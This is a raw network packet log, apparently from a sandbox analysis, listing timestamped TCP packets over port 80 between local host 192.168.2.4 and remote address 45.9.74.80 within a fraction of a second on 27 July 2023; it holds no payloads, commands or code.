Jul 27, 2023 20:19:00.163770914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.163784027 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.163813114 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.163829088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.163858891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.163888931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.163918018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.163929939 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.163957119 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.163973093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.164005041 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.164273977 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.164321899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.164604902 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.164637089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.164659977 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.164684057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.164715052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.164758921 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.164841890 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.164874077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.164887905 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.164917946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.164948940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.164988041 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.165019989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.165050983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.165066004 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.165143013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.165174961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.165208101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.165239096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.165270090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.165301085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.165330887 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.165345907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.165394068 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.165493965 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.165596008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.165628910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.165683985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.165983915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166014910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166045904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166079044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166094065 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.166116953 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.166137934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166172981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166203022 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166233063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166246891 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.166270971 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.166289091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166320086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166349888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166380882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.166393995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.166431904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.168452978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.168605089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.168639898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.168673992 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.168709993 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.168737888 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.168930054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.168970108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.168999910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.169024944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.169051886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.169084072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.169125080 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.169126034 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.169161081 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.169178009 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.169203997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.169228077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.169281960 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.174237967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.179613113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179642916 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179668903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179692030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179718018 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.179735899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179747105 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.179776907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179785013 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.179810047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179835081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179861069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179874897 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.179899931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179914951 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.179935932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179960012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.179984093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.180008888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.180025101 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.180044889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.180073023 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.180092096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.180109978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.180134058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.180155039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.180176020 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.180192947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.180210114 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.180229902 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.180282116 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.186180115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.186264992 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.186325073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.186369896 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.186427116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.186497927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.186558008 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.186599016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.186652899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.186688900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.186753988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.186820030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.186871052 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.186912060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.186961889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.186985016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.187052011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.187129021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.187211037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.187230110 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.187271118 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.187324047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.187390089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.187444925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.187496901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.187544107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.187597990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.187644958 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.187710047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.187767982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.187819958 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.187863111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.187911987 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.187963963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188024044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188092947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188149929 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.188190937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188240051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.188317060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188374996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188432932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188488960 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.188528061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188579082 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.188621998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188683987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188750029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188800097 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.188841105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.188893080 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.188941956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.189009905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.189079046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.189151049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.189177036 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.189245939 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.189312935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.189376116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.189465046 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.189527035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.189594984 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.189647913 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.189692974 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.189749956 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.191049099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.191137075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.191205978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.191262007 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.191293001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.191343069 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.191369057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.191436052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.191503048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.191555977 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.191600084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.191653967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.191725016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.191795111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.191859961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.191915035 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.191982031 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.192048073 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.192081928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.198168039 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.200072050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.200125933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.200175047 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.202471018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202513933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202549934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202585936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202621937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202666998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202678919 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.202694893 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.202694893 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.202733040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202769995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202795029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202828884 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.202847004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202867985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.202898026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202941895 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.202980042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.203002930 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.203036070 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.203051090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.203088999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.203125000 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.203160048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.203181028 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.203213930 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.203243017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.207554102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.215657949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.215740919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.215838909 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.215909004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.215966940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.216067076 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.216131926 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.216187954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.216303110 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.216341019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.217215061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.217374086 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.217417955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.217492104 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.217535019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.217592001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.217647076 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.217724085 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.217765093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.217843056 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.217881918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.217938900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.217994928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218075037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.218118906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218188047 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.218219995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218257904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218296051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218355894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218365908 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.218405962 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.218440056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218480110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218517065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218575001 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.218591928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218641043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.218666077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218703985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218740940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218801022 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218811989 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.218856096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.218888044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218924999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.218962908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219017029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.219038963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219093084 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.219120026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219150066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219199896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219211102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.219240904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219269037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219316006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219326019 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.219364882 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.219388962 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219417095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219445944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219496965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219542980 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.219577074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219587088 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.219618082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219646931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219676018 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.219710112 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219738007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219765902 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219789982 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.219829082 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.219855070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219883919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219913006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219938993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.219966888 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.219999075 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.220026016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.220055103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.220083952 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.220113039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.220140934 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.220186949 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.221678972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.221712112 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.221740961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.221797943 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.222290993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.222368002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.227268934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227364063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227394104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227421999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227457047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227467060 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.227495909 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.227513075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227541924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227570057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227600098 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.227612019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227627039 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.227653980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227683067 CEST	80	49693	45.9.74.80	192.168.2.4
